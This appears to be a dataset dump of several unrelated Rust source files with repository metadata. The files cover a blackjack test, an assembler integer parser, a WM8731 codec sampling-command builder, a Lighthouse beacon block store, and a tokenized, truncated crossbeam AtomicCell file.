Arc::new(Card::from(Suit::Club, Rank::Four)); let mut dealer = BlackjackHand::with_cards(PlayerType::Dealer, vec![card1, card2]); assert!(dealer.can_hit()); // 7 let card3 = Arc::new(Card::from(Suit::Club, Rank::King)); dealer.add_card(card3.clone()); assert!(!dealer.can_hit()); // 17 dealer.reset(); let card1 = Arc::new(Card::from(Suit::Club, Rank::Ace)); let card2 = Arc::new(Card::from(Suit::Club, Rank::Six)); dealer.add_cards(vec![card1, card2]); assert!(dealer.can_hit()); // soft 17 dealer.add_card(card3); assert!(!dealer.can_hit()); // hard 17 } }
true
bbe862c809525ed0b94f174f3eb20b8857fd3991
Rust
oky-123/build_your_own_x
/ProgrammingLanuage/iridium/src/assembler/integer_parsers.rs
UTF-8
859
3.1875
3
[]
no_license
use nom::digit; use nom::types::CompleteStr; use crate::assembler::Token; named!(pub integer<CompleteStr, Token>, ws!( do_parse!( tag!("#") >> reg_num: digit >> ( Token::IntegerOperand{value: reg_num.parse::<i32>().unwrap()} ) ) ) ); mod tests { #[allow(unused_imports)] use super::*; #[test] fn test_parse_integer() { // Test a valid integer operand let result = integer(CompleteStr("#10")); assert_eq!(result.is_ok(), true); let (rest, value) = result.unwrap(); assert_eq!(rest, CompleteStr("")); assert_eq!(value, Token::IntegerOperand { value: 10 }); // Test an invalid one (missing the #) let result = integer(CompleteStr("10")); assert_eq!(result.is_ok(), false); } }
true
fbbdb0697c554df31d4b931a8d1a6a7f81cc2d97
Rust
YruamaLairba/wm8731-alt
/src/command/sampling.rs
UTF-8
22,809
3.234375
3
[ "MIT" ]
permissive
//! Command builder for sampling configuration. //! //! This module offer two style for building a command, a nice style using a master clock and a raw //! style allowing more advance use. //! //! # Style with master clock //! With this method, the builder is instantiated with a marker to indicate the internal master clock //! frequency. Valid markers are : //! - `Mclk12M288` for a 12.288 MHz master clock //! - `Mclk18M432` for a 18.432 MHz master clock //! - `Mclk11M2896` for a 11.2896 MHz master clock //! - `Mclk16M9344` for a 16.9344 MHz master clock //! - `Mclk12M` for a 12MHz master clock, correspond to USB mode. //! //! You also don't write directly to USB/NORMAL, BOSR, or SR fields. Instead, you use a *virtual* //! SampleRate field that do it for you. //! //! ## Example //! ``` //! # use wm8731_alt::command::sampling::*; //! //instantiate the builder //! let cmd = sampling_with_mclk(Mclk12M288); //! //setup the sampling rate //! let cmd = cmd.sample_rate().adc48k_dac48k(); //! //build the command //! let cmd = cmd.into_command(); //! ``` //! //! # Raw style //! With this method, you write directly to USB/NORMAL, BOSR, and SR fields. This way is useful for //! case not handled by the other method. Notably, the Sr field writer don't have very meaningful //! method name, because same combination of USB/NORMAL, BOSR, and SR can produce different //! sampling rate by just changing the master clock. Look the //! [WAN0117](https://statics.cirrus.com/pubs/appNote/WAN0117.pdf) application notice for //! advanced sampling rate selection. //! //! ## Example //! ``` //! # use wm8731_alt::command::sampling::*; //! //instantiate the builder //! let cmd = sampling(); //! //normal mode operation //! let cmd = cmd.usb_normal().normal(); //! //write bosr bit //! let cmd = cmd.bosr().clear_bit(); //! //write sr field //! let cmd = cmd.sr().sr_0b0000(); //! //build the command //! let cmd = cmd.into_command(); //! ``` //! //! # Safety and coherence //! To guarantee safety and coherence, some manipulation are enforced or prohibited. //! //! When indicating a Master clock: //! - `sample_rate` need to be set explicitly. //! - available sample rate is Master Clock dependent. //! //! With the raw method: //! - if `usb_normal` or `bosr` are written, `sr` is invalidated and need to be rewritten. //! - available `sr` setting depends on `usb_normal` and `bosr` setting. //! //! ## Example of bad usage //! Following example show incorrect usage and should not compile. //! ``` //! # #[cfg(any())] //avoid some compilation error when testing doc //! # { //! # use wm8731_alt::command::sampling::*; //! //error, sample rate require to be explicitly set //! let cmd = sampling_with_mclk(Mclk12M288).into_command(); //! //error, this sampling rate setup is impossible with the current master clock //! let cmd = sampling_with_mclk(Mclk12M288).sample_rate().adc44k1_dac44k1(); //! //error, change USB/Normal invalidate SR. //! let cmd = sampling().usb_normal().usb().into_command(); //! //error, change BOSR invalidate SR. //! let cmd = sampling().bosr().clear_bit().into_command(); //! //error, USB/NORMAL, BOSR, SR combination is invalid //! let cmd = //! sampling().usb_normal().usb().bosr().set_bit().sr().sr_0b0000(); //! # } //! ``` //! //! #![allow(clippy::new_without_default)] use crate::Command; use core::marker::PhantomData; pub mod state_marker { //! Markers to track state of the sampling builder. //! //! They are used with the sampling builder to provide coherent API and compile time safety check. /// Marker used to indicate Normal mode. pub struct Normal; /// Marker used to indicate USB mode. pub struct Usb; /// Marker used to indicate BOSR bit is set. pub struct BosrSet; /// Marker used to indicate BOSR bit is clear. pub struct BosrClear; /// Marker used to indicate Sr or SampleRate is valid. pub struct SrValid; /// Marker used to indicate Sr or SampleRate is not valid. /// /// `Sampling` configuration marked with this can not produce a command. pub struct SrInvalid; } use state_marker::*; /// Builder for sampling command. #[derive(Debug, Eq, PartialEq)] pub struct Sampling<T> { data: u16, t: PhantomData<T>, } impl<T> Copy for Sampling<T> {} impl<T> Clone for Sampling<T> { fn clone(&self) -> Self { *self } } //common to both method it's always safe to manipulate those fields impl<T> Sampling<T> { pub fn clkidiv2(self) -> Clkidiv2<T> { Clkidiv2 { cmd: self } } pub fn clkodiv2(self) -> Clkodiv2<T> { Clkodiv2 { cmd: self } } } ///Marker indicating use of 12.288Mhz internal master clock (normal mode). pub struct Mclk12M288; impl Mclk for Mclk12M288 {} ///Marker indicating use of 18.432Mhz internal master clock (normal mode). pub struct Mclk18M432; impl Mclk for Mclk18M432 {} ///Marker indicating use of 11.2896Mhz internal master clock (normal mode). pub struct Mclk11M2896; impl Mclk for Mclk11M2896 {} ///Marker indicating use of 16.9344Mhz internal master clock (normal mode). pub struct Mclk16M9344; impl Mclk for Mclk16M9344 {} ///Marker indicating use of 12Mhz internal master clock (USB mode). pub struct Mclk12M; impl Mclk for Mclk12M {} /// Marker trait to say a marker correspond to a master clock value. pub trait Mclk {} /// Instantiate a command builder to set sampling configuration for a particular master clock. pub fn sampling_with_mclk<MCLK>(_: MCLK) -> Sampling<(MCLK, SrInvalid)> where MCLK: Mclk, { Sampling::<(MCLK, SrInvalid)> { data: 0b1000 << 9, t: PhantomData::<(MCLK, SrInvalid)>, } } impl<MCLK, SR> Sampling<(MCLK, SR)> where MCLK: Mclk, { pub fn sample_rate(self) -> SampleRate<(MCLK, SR)> { SampleRate::<(MCLK, SR)> { cmd: self } } } /// Virtual field writer for more meaningful sampling rate setting. /// /// This actually write USB/NORMAL, BOSR, and SR fields. pub struct SampleRate<T> { cmd: Sampling<T>, } impl<MCLK, SR> SampleRate<(MCLK, SR)> { unsafe fn bits(mut self, value: u8) -> Sampling<(MCLK, SrValid)> { let mask = !((!0) << 6); self.cmd.data = self.cmd.data & !mask | (value as u16) << 2 & mask; Sampling::<(MCLK, SrValid)> { data: self.cmd.data, t: PhantomData::<(MCLK, SrValid)>, } } } impl<SR> SampleRate<(Mclk12M288, SR)> { ///Set 48khz sampling rate for ADC and DAC. #[must_use] pub fn adc48k_dac48k(self) -> Sampling<(Mclk12M288, SrValid)> { unsafe { self.bits(0b000000) } } ///Set sampling rate of 48khz for ADC and 8khz for DAC. #[must_use] pub fn adc48k_dac8k(self) -> Sampling<(Mclk12M288, SrValid)> { unsafe { self.bits(0b000100) } } ///Set sampling rate of 8khz for ADC and 48khz for DAC. #[must_use] pub fn adc8k_dac48k(self) -> Sampling<(Mclk12M288, SrValid)> { unsafe { self.bits(0b001000) } } ///Set 8khz sampling rate for ADC and DAC. #[must_use] pub fn adc8k_dac8k(self) -> Sampling<(Mclk12M288, SrValid)> { unsafe { self.bits(0b001100) } } ///Set 32khz sampling rate for ADC and DAC. #[must_use] pub fn adc32k_dac32k(self) -> Sampling<(Mclk12M288, SrValid)> { unsafe { self.bits(0b011000) } } ///Set 96khz sampling rate for ADC and DAC. #[must_use] pub fn adc96k_dac96k(self) -> Sampling<(Mclk12M288, SrValid)> { unsafe { self.bits(0b011100) } } } impl<SR> SampleRate<(Mclk18M432, SR)> { ///Set 48khz sampling rate for ADC and DAC. #[must_use] pub fn adc48k_dac48k(self) -> Sampling<(Mclk18M432, SrValid)> { unsafe { self.bits(0b000010) } } ///Set sampling rate of 48khz for ADC and 8khz for DAC. #[must_use] pub fn adc48k_dac8k(self) -> Sampling<(Mclk18M432, SrValid)> { unsafe { self.bits(0b000110) } } ///Set sampling rate of 8khz for ADC and 48khz for DAC. #[must_use] pub fn adc8k_dac48k(self) -> Sampling<(Mclk18M432, SrValid)> { unsafe { self.bits(0b001010) } } ///Set 8khz sampling rate for ADC and DAC. #[must_use] pub fn adc8k_dac8k(self) -> Sampling<(Mclk18M432, SrValid)> { unsafe { self.bits(0b001110) } } ///Set 32khz sampling rate for ADC and DAC. #[must_use] pub fn adc32k_dac32k(self) -> Sampling<(Mclk18M432, SrValid)> { unsafe { self.bits(0b011010) } } ///Set 96khz sampling rate for ADC and DAC. #[must_use] pub fn adc96k_dac96k(self) -> Sampling<(Mclk18M432, SrValid)> { unsafe { self.bits(0b011110) } } } impl<SR> SampleRate<(Mclk11M2896, SR)> { ///Set 44.1khz sampling rate for ADC and DAC. #[must_use] pub fn adc44k1_dac44k1(self) -> Sampling<(Mclk11M2896, SrValid)> { unsafe { self.bits(0b100000) } } ///Set sampling rate of 44.1khz for ADC and approximatively 8khz for DAC. /// ///The actual DAC sampling rate is 8.018kHz #[must_use] pub fn adc44k1_dac8k(self) -> Sampling<(Mclk11M2896, SrValid)> { unsafe { self.bits(0b100100) } } ///Set sampling rate of approximatively 8khz for ADC and 44.1khz for DAC. /// ///The actual ADC sampling rate is 8.018kHz #[must_use] pub fn adc8k_dac44k1(self) -> Sampling<(Mclk11M2896, SrValid)> { unsafe { self.bits(0b101000) } } ///Set approximatively 8khz sampling rate for ADC and DAC. /// ///The actual sampling rate is 8.018kHz #[must_use] pub fn adc8k_dac8k(self) -> Sampling<(Mclk11M2896, SrValid)> { unsafe { self.bits(0b101100) } } ///Set 88.2khz sampling rate for ADC and DAC. #[must_use] pub fn adc88k2_dac88k2(self) -> Sampling<(Mclk11M2896, SrValid)> { unsafe { self.bits(0b111100) } } } impl<SR> SampleRate<(Mclk16M9344, SR)> { ///Set 44.1khz sampling rate for ADC and DAC. #[must_use] pub fn adc44k1_dac44k1(self) -> Sampling<(Mclk16M9344, SrValid)> { unsafe { self.bits(0b100010) } } ///Set sampling rate of 44.1khz for ADC and approximatively 8khz for DAC. /// ///The actual DAC sampling rate is 8.018kHz #[must_use] pub fn adc44k1_dac8k(self) -> Sampling<(Mclk16M9344, SrValid)> { unsafe { self.bits(0b100110) } } ///Set sampling rate of approximatively 8khz for ADC and 44.1khz for DAC. /// ///The actual ADC sampling rate is 8.018kHz #[must_use] pub fn adc8k_dac44k1(self) -> Sampling<(Mclk16M9344, SrValid)> { unsafe { self.bits(0b101010) } } ///Set approximatively 8khz sampling rate for ADC and DAC. /// ///The actual sampling rate is 8.018kHz #[must_use] pub fn adc8k_dac8k(self) -> Sampling<(Mclk16M9344, SrValid)> { unsafe { self.bits(0b101110) } } ///Set 88.2khz sampling rate for ADC and DAC. #[must_use] pub fn adc88k2_dac88k2(self) -> Sampling<(Mclk16M9344, SrValid)> { unsafe { self.bits(0b111110) } } } impl<SR> SampleRate<(Mclk12M, SR)> { ///Set 48khz sampling rate for ADC and DAC. #[must_use] pub fn adc48k_dac48k(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b000001) } } ///Set approximatively 44.1khz sampling rate for ADC and DAC. /// ///The actual sampling rate is 44.118kHz. #[must_use] pub fn adc44k1_dac44k1(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b100011) } } ///Set sampling rate of 48khz for ADC and 8khz for DAC. #[must_use] pub fn adc48k_dac8k(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b000101) } } ///Set sampling rate of approximatively 44.1khz for ADC and approximatively 8khz for DAC. /// ///The actual sampling rate are 44.118kHz for the ADC and 8.021kHz for the DAC. #[must_use] pub fn adc44k1_dac8k(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b100111) } } ///Set sampling rate of 8khz for ADC and 48khz for DAC. #[must_use] pub fn adc8k_dac48k(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b001001) } } ///Set sampling rate of approximatively 8khz for ADC and approximatively 44.1khz for DAC. /// ///The actual sampling rate are 8.021kHz for the ADC and 44.118kHz for the DAC. #[must_use] pub fn adc8k_dac44k1(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b101011) } } ///Set 8khz sampling rate for ADC and DAC. #[must_use] pub fn adc8k_dac8k(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b001101) } } ///Set approximatively 8khz sampling rate for ADC and DAC. /// ///The actual sampling rate is 8.021kHz. #[must_use] pub fn adc8k_dac8k_bis(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b101111) } } ///Set 32khz sampling rate for ADC and DAC. #[must_use] pub fn adc32k_dac32k(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b011001) } } ///Set 96khz sampling rate for ADC and DAC. #[must_use] pub fn adc96k_dac96k(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b011101) } } ///Set approximatively 88.2kHz sampling rate for ADC and DAC. /// ///The actual sampling rate is 88.235kHz. #[must_use] pub fn adc88k2_dac88k2(self) -> Sampling<(Mclk12M, SrValid)> { unsafe { self.bits(0b111111) } } } //Once SampleRate have been explicitly set, a valid command can be instantiated impl<MCLK> Sampling<(MCLK, SrValid)> { /// Instanciate a command pub fn into_command(self) -> Command<()> { Command::<()> { data: self.data, t: PhantomData::<()>, } } } /// Instanciate a command builder for sampling configuration. pub fn sampling() -> Sampling<(Normal, BosrClear, SrValid)> { Sampling::<(Normal, BosrClear, SrValid)>::new() } impl Sampling<(Normal, BosrClear, SrValid)> { #[allow(clippy::identity_op)] fn new() -> Self { Self { data: 0b1000 << 9 | 0b0000_0000, t: PhantomData::<(Normal, BosrClear, SrValid)>, } } } //Once sr have been explicitly set, a valid command can be instantiated impl<MODE, BOSR> Sampling<(MODE, BOSR, SrValid)> { /// Instanciate a command pub fn into_command(self) -> Command<()> { Command::<()> { data: self.data, t: PhantomData::<()>, } } } //field accessible in raw mode impl<MODE, BOSR, SR> Sampling<(MODE, BOSR, SR)> { pub fn usb_normal(self) -> UsbNormal<(MODE, BOSR, SR)> { UsbNormal { cmd: self } } pub fn bosr(self) -> Bosr<(MODE, BOSR, SR)> { Bosr { cmd: self } } pub fn sr(self) -> Sr<(MODE, BOSR, SR)> { Sr { cmd: self } } } /// Field writer. Allow to select USB or Normal mode. Invalidate `Sr` field. pub struct UsbNormal<T> { cmd: Sampling<T>, } impl<MODE, BOSR, SR> UsbNormal<(MODE, BOSR, SR)> { #[must_use] pub fn clear_bit(mut self) -> Sampling<(Normal, BOSR, SrInvalid)> { self.cmd.data &= !(0b1 << 0); Sampling::<(Normal, BOSR, SrInvalid)> { data: self.cmd.data, t: PhantomData::<(Normal, BOSR, SrInvalid)>, } } #[must_use] pub fn set_bit(mut self) -> Sampling<(Usb, BOSR, SrInvalid)> { self.cmd.data |= 0b1 << 0; Sampling::<(Usb, BOSR, SrInvalid)> { data: self.cmd.data, t: PhantomData::<(Usb, BOSR, SrInvalid)>, } } #[must_use] pub fn normal(mut self) -> Sampling<(Normal, BOSR, SrInvalid)> { self.cmd.data &= !(0b1 << 0); Sampling::<(Normal, BOSR, SrInvalid)> { data: self.cmd.data, t: PhantomData::<(Normal, BOSR, SrInvalid)>, } } #[must_use] pub fn usb(mut self) -> Sampling<(Usb, BOSR, SrInvalid)> { self.cmd.data |= 0b1 << 0; Sampling::<(Usb, BOSR, SrInvalid)> { data: self.cmd.data, t: PhantomData::<(Usb, BOSR, SrInvalid)>, } } } /// Field writer. Select the Base Over-Sampling Rate. Invalidate `Sr` field. pub struct Bosr<T> { cmd: Sampling<T>, } impl<MODE, BOSR, SR> Bosr<(MODE, BOSR, SR)> { #[must_use] pub fn clear_bit(mut self) -> Sampling<(MODE, BosrClear, SrInvalid)> { self.cmd.data &= !(0b1 << 1); Sampling::<(MODE, BosrClear, SrInvalid)> { data: self.cmd.data, t: PhantomData::<(MODE, BosrClear, SrInvalid)>, } } #[must_use] pub fn set_bit(mut self) -> Sampling<(MODE, BosrSet, SrInvalid)> { self.cmd.data |= 0b1 << 1; Sampling::<(MODE, BosrSet, SrInvalid)> { data: self.cmd.data, t: PhantomData::<(MODE, BosrSet, SrInvalid)>, } } } /// Field writer. Allow to write raw bits into the sr field. pub struct Sr<T> { cmd: Sampling<T>, } impl<MODE, BOSR, SR> Sr<(MODE, BOSR, SR)> { //impl_bits!(unsafe, Sampling<T>, 4, 2); /// Set the field with raw bits. /// /// # Safety /// /// This is unsafe because it assume valid bits combination that may actually not. Please read /// the datasheet to know what are the valid combinations. pub unsafe fn bits(mut self, value: u8) -> Sampling<(MODE, BOSR, SrValid)> { let mask = !((!0) << 4) << 2; self.cmd.data = self.cmd.data & !mask | (value as u16) << 2 & mask; Sampling::<(MODE, BOSR, SrValid)> { data: self.cmd.data, t: PhantomData::<(MODE, BOSR, SrValid)>, } } } impl<BOSR, SR> Sr<(Normal, BOSR, SR)> { #[must_use] pub fn sr_0b0000(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b0000) } } #[must_use] pub fn sr_0b0001(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b0001) } } #[must_use] pub fn sr_0b0010(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b0010) } } #[must_use] pub fn sr_0b0011(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b0011) } } #[must_use] pub fn sr_0b0110(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b0110) } } #[must_use] pub fn sr_0b0111(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b0111) } } #[must_use] pub fn sr_0b1000(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b1000) } } #[must_use] pub fn sr_0b1001(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b1001) } } #[must_use] pub fn sr_0b1010(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b1010) } } #[must_use] pub fn sr_0b1011(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b1011) } } #[must_use] pub fn sr_0b1111(self) -> Sampling<(Normal, BOSR, SrValid)> { unsafe { self.bits(0b1111) } } } impl<SR> Sr<(Usb, BosrClear, SR)> { #[must_use] pub fn sr_0b0000(self) -> Sampling<(Usb, BosrClear, SrValid)> { unsafe { self.bits(0b0000) } } #[must_use] pub fn sr_0b0001(self) -> Sampling<(Usb, BosrClear, SrValid)> { unsafe { self.bits(0b0001) } } #[must_use] pub fn sr_0b0010(self) -> Sampling<(Usb, BosrClear, SrValid)> { unsafe { self.bits(0b0010) } } #[must_use] pub fn sr_0b0011(self) -> Sampling<(Usb, BosrClear, SrValid)> { unsafe { self.bits(0b0011) } } #[must_use] pub fn sr_0b0110(self) -> Sampling<(Usb, BosrClear, SrValid)> { unsafe { self.bits(0b0110) } } #[must_use] pub fn sr_0b0111(self) -> Sampling<(Usb, BosrClear, SrValid)> { unsafe { self.bits(0b0111) } } } impl<SR> Sr<(Usb, BosrSet, SR)> { #[must_use] pub fn sr_0b1000(self) -> Sampling<(Usb, BosrSet, SrValid)> { unsafe { self.bits(0b1000) } } #[must_use] pub fn sr_0b1001(self) -> Sampling<(Usb, BosrSet, SrValid)> { unsafe { self.bits(0b1001) } } #[must_use] pub fn sr_0b1010(self) -> Sampling<(Usb, BosrSet, SrValid)> { unsafe { self.bits(0b1010) } } #[must_use] pub fn sr_0b1011(self) -> Sampling<(Usb, BosrSet, SrValid)> { unsafe { self.bits(0b1011) } } #[must_use] pub fn sr_0b1111(self) -> Sampling<(Usb, BosrSet, SrValid)> { unsafe { self.bits(0b1111) } } } impl_toggle_writer!(Clkidiv2<T>, Sampling<T>, 6); impl_toggle_writer!(Clkodiv2<T>, Sampling<T>, 7); #[cfg(test)] mod tests { use super::*; // all() to compile, any() to not compile #[cfg(all())] fn _should_compile() { let _ = sampling_with_mclk(Mclk12M288) .sample_rate() .adc48k_dac48k() .into_command(); let new_cmd = sampling(); //default is valid new_cmd.into_command(); //setting sr from default is valid new_cmd.sr().sr_0b0000().into_command(); } // all() to compile, any() to not compile #[cfg(any())] fn _should_compile_warn() { let new_cmd = sampling(); //should warn, you may think you change the command but this is not the case new_cmd.usb_normal().normal(); let cmd = sampling_with_mclk(Mclk12M288); //should warn, you may think you change the command but this is not the case cmd.sample_rate().adc48k_dac48k(); } // all() to compile, any() to not compile #[cfg(any())] fn _should_compile_error() { //error, when specifying mclk, Sampling rate default value is undefined. sampling_with_mclk(Mclk11M2896).into_command(); //error, invalid combinations of clock and sample rate. sampling_with_mclk(Mclk11M2896) .sample_rate() .adc48k_dac48k(); sampling_with_mclk(Mclk16M9344) .sample_rate() .adc96k_dac96k(); sampling_with_mclk(Mclk12M288) .sample_rate() .adc44k1_dac44k1(); sampling_with_mclk(Mclk18M432) .sample_rate() .adc88k1_dac88k1(); let new_cmd = sampling(); //error, can't build the command, setting USB/Normal invalidate sr. let _ = new_cmd.usb_normal().normal().into_command(); //error, can't build the command, setting BOSR invalidate sr. let _ = new_cmd.bosr().clear_bit().into_command(); //error, cannot set this sr value with this bosr value let _ = new_cmd .usb_normal() .usb() .bosr() .clear_bit() .sr() .sr_0b1111(); //error, cannot set this sr value with this bosr value let _ = new_cmd.usb_normal().usb().bosr().set_bit().sr().sr_0b0000(); } }
true
0089bd058d57d1551f2b161364544098976aa9f4
Rust
mluluz/lighthouse
/beacon_node/db/src/stores/beacon_block_store.rs
UTF-8
7,951
3.046875
3
[ "Apache-2.0" ]
permissive
use super::BLOCKS_DB_COLUMN as DB_COLUMN; use super::{ClientDB, DBError}; use ssz::Decodable; use std::sync::Arc; use types::{BeaconBlock, Hash256, Slot}; #[derive(Clone, Debug, PartialEq)] pub enum BeaconBlockAtSlotError { UnknownBeaconBlock(Hash256), InvalidBeaconBlock(Hash256), DBError(String), } pub struct BeaconBlockStore<T> where T: ClientDB, { db: Arc<T>, } // Implements `put`, `get`, `exists` and `delete` for the store. impl_crud_for_store!(BeaconBlockStore, DB_COLUMN); impl<T: ClientDB> BeaconBlockStore<T> { pub fn new(db: Arc<T>) -> Self { Self { db } } pub fn get_deserialized(&self, hash: &Hash256) -> Result<Option<BeaconBlock>, DBError> { match self.get(&hash)? { None => Ok(None), Some(ssz) => { let (block, _) = BeaconBlock::ssz_decode(&ssz, 0).map_err(|_| DBError { message: "Bad BeaconBlock SSZ.".to_string(), })?; Ok(Some(block)) } } } /// Retrieve the block at a slot given a "head_hash" and a slot. /// /// A "head_hash" must be a block hash with a slot number greater than or equal to the desired /// slot. /// /// This function will read each block down the chain until it finds a block with the given /// slot number. If the slot is skipped, the function will return None. /// /// If a block is found, a tuple of (block_hash, serialized_block) is returned. /// /// Note: this function uses a loop instead of recursion as the compiler is over-strict when it /// comes to recursion and the `impl Trait` pattern. See: /// https://stackoverflow.com/questions/54032940/using-impl-trait-in-a-recursive-function pub fn block_at_slot( &self, head_hash: &Hash256, slot: Slot, ) -> Result<Option<(Hash256, BeaconBlock)>, BeaconBlockAtSlotError> { let mut current_hash = *head_hash; loop { if let Some(block) = self.get_deserialized(&current_hash)? { if block.slot == slot { break Ok(Some((current_hash, block))); } else if block.slot < slot { break Ok(None); } else { current_hash = block.previous_block_root; } } else { break Err(BeaconBlockAtSlotError::UnknownBeaconBlock(current_hash)); } } } } impl From<DBError> for BeaconBlockAtSlotError { fn from(e: DBError) -> Self { BeaconBlockAtSlotError::DBError(e.message) } } #[cfg(test)] mod tests { use super::super::super::MemoryDB; use super::*; use std::sync::Arc; use std::thread; use ssz::ssz_encode; use types::test_utils::{SeedableRng, TestRandom, XorShiftRng}; use types::BeaconBlock; use types::Hash256; test_crud_for_store!(BeaconBlockStore, DB_COLUMN); #[test] fn head_hash_slot_too_low() { let db = Arc::new(MemoryDB::open()); let bs = Arc::new(BeaconBlockStore::new(db.clone())); let mut rng = XorShiftRng::from_seed([42; 16]); let mut block = BeaconBlock::random_for_test(&mut rng); block.slot = Slot::from(10_u64); let block_root = block.canonical_root(); bs.put(&block_root, &ssz_encode(&block)).unwrap(); let result = bs.block_at_slot(&block_root, Slot::from(11_u64)).unwrap(); assert_eq!(result, None); } #[test] fn test_invalid_block_at_slot() { let db = Arc::new(MemoryDB::open()); let store = BeaconBlockStore::new(db.clone()); let ssz = "definitly not a valid block".as_bytes(); let hash = &Hash256::from([0xAA; 32]); db.put(DB_COLUMN, hash.as_bytes(), ssz).unwrap(); assert_eq!( store.block_at_slot(hash, Slot::from(42_u64)), Err(BeaconBlockAtSlotError::DBError( "Bad BeaconBlock SSZ.".into() )) ); } #[test] fn test_unknown_block_at_slot() { let db = Arc::new(MemoryDB::open()); let store = BeaconBlockStore::new(db.clone()); let ssz = "some bytes".as_bytes(); let hash = &Hash256::from([0xAA; 32]); let other_hash = &Hash256::from([0xBB; 32]); db.put(DB_COLUMN, hash.as_bytes(), ssz).unwrap(); assert_eq!( store.block_at_slot(other_hash, Slot::from(42_u64)), Err(BeaconBlockAtSlotError::UnknownBeaconBlock(*other_hash)) ); } #[test] fn test_block_store_on_memory_db() { let db = Arc::new(MemoryDB::open()); let bs = Arc::new(BeaconBlockStore::new(db.clone())); let thread_count = 10; let write_count = 10; let mut handles = vec![]; for t in 0..thread_count { let wc = write_count; let bs = bs.clone(); let handle = thread::spawn(move || { for w in 0..wc { let key = t * w; let val = 42; bs.put(&Hash256::from_low_u64_le(key), &vec![val]).unwrap(); } }); handles.push(handle); } for handle in handles { handle.join().unwrap(); } for t in 0..thread_count { for w in 0..write_count { let key = t * w; assert!(bs.exists(&Hash256::from_low_u64_le(key)).unwrap()); let val = bs.get(&Hash256::from_low_u64_le(key)).unwrap().unwrap(); assert_eq!(vec![42], val); } } } #[test] #[ignore] fn test_block_at_slot() { let db = Arc::new(MemoryDB::open()); let bs = Arc::new(BeaconBlockStore::new(db.clone())); let mut rng = XorShiftRng::from_seed([42; 16]); // Specify test block parameters. let hashes = [ Hash256::from([0; 32]), Hash256::from([1; 32]), Hash256::from([2; 32]), Hash256::from([3; 32]), Hash256::from([4; 32]), ]; let parent_hashes = [ Hash256::from([255; 32]), // Genesis block. Hash256::from([0; 32]), Hash256::from([1; 32]), Hash256::from([2; 32]), Hash256::from([3; 32]), ]; let unknown_hash = Hash256::from([101; 32]); // different from all above let slots: Vec<Slot> = vec![0, 1, 3, 4, 5].iter().map(|x| Slot::new(*x)).collect(); // Generate a vec of random blocks and store them in the DB. let block_count = 5; let mut blocks: Vec<BeaconBlock> = Vec::with_capacity(5); for i in 0..block_count { let mut block = BeaconBlock::random_for_test(&mut rng); block.previous_block_root = parent_hashes[i]; block.slot = slots[i]; let ssz = ssz_encode(&block); db.put(DB_COLUMN, hashes[i].as_bytes(), &ssz).unwrap(); blocks.push(block); } // Test that certain slots can be reached from certain hashes. let test_cases = vec![(4, 4), (4, 3), (4, 2), (4, 1), (4, 0)]; for (hashes_index, slot_index) in test_cases { let (matched_block_hash, block) = bs .block_at_slot(&hashes[hashes_index], slots[slot_index]) .unwrap() .unwrap(); assert_eq!(matched_block_hash, hashes[slot_index]); assert_eq!(block.slot, slots[slot_index]); } let ssz = bs.block_at_slot(&hashes[4], Slot::new(2)).unwrap(); assert_eq!(ssz, None); let ssz = bs.block_at_slot(&hashes[4], Slot::new(6)).unwrap(); assert_eq!(ssz, None); let ssz = bs.block_at_slot(&unknown_hash, Slot::new(2)); assert_eq!( ssz, Err(BeaconBlockAtSlotError::UnknownBeaconBlock(unknown_hash)) ); } }
true
982a7a18f8c37a6ba242937c6ebea6a4adb7bedd
Rust
marco-c/gecko-dev-wordified-and-comments-removed
/third_party/rust/crossbeam-utils/src/atomic/atomic_cell.rs
UTF-8
19,180
2.703125
3
[ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference", "MIT" ]
permissive
# ! [ allow ( clippy : : unit_arg ) ] use crate : : primitive : : sync : : atomic : : { self AtomicBool } ; use core : : cell : : UnsafeCell ; use core : : cmp ; use core : : fmt ; use core : : mem : : { self ManuallyDrop MaybeUninit } ; use core : : sync : : atomic : : Ordering ; use core : : ptr ; # [ cfg ( feature = " std " ) ] use std : : panic : : { RefUnwindSafe UnwindSafe } ; use super : : seq_lock : : SeqLock ; # [ repr ( transparent ) ] pub struct AtomicCell < T > { value : UnsafeCell < MaybeUninit < T > > } unsafe impl < T : Send > Send for AtomicCell < T > { } unsafe impl < T : Send > Sync for AtomicCell < T > { } # [ cfg ( feature = " std " ) ] impl < T > UnwindSafe for AtomicCell < T > { } # [ cfg ( feature = " std " ) ] impl < T > RefUnwindSafe for AtomicCell < T > { } impl < T > AtomicCell < T > { pub const fn new ( val : T ) - > AtomicCell < T > { AtomicCell { value : UnsafeCell : : new ( MaybeUninit : : new ( val ) ) } } pub fn into_inner ( self ) - > T { let this = ManuallyDrop : : new ( self ) ; unsafe { this . as_ptr ( ) . read ( ) } } pub const fn is_lock_free ( ) - > bool { atomic_is_lock_free : : < T > ( ) } pub fn store ( & self val : T ) { if mem : : needs_drop : : < T > ( ) { drop ( self . swap ( val ) ) ; } else { unsafe { atomic_store ( self . as_ptr ( ) val ) ; } } } pub fn swap ( & self val : T ) - > T { unsafe { atomic_swap ( self . as_ptr ( ) val ) } } # [ inline ] pub fn as_ptr ( & self ) - > * mut T { self . value . get ( ) . cast : : 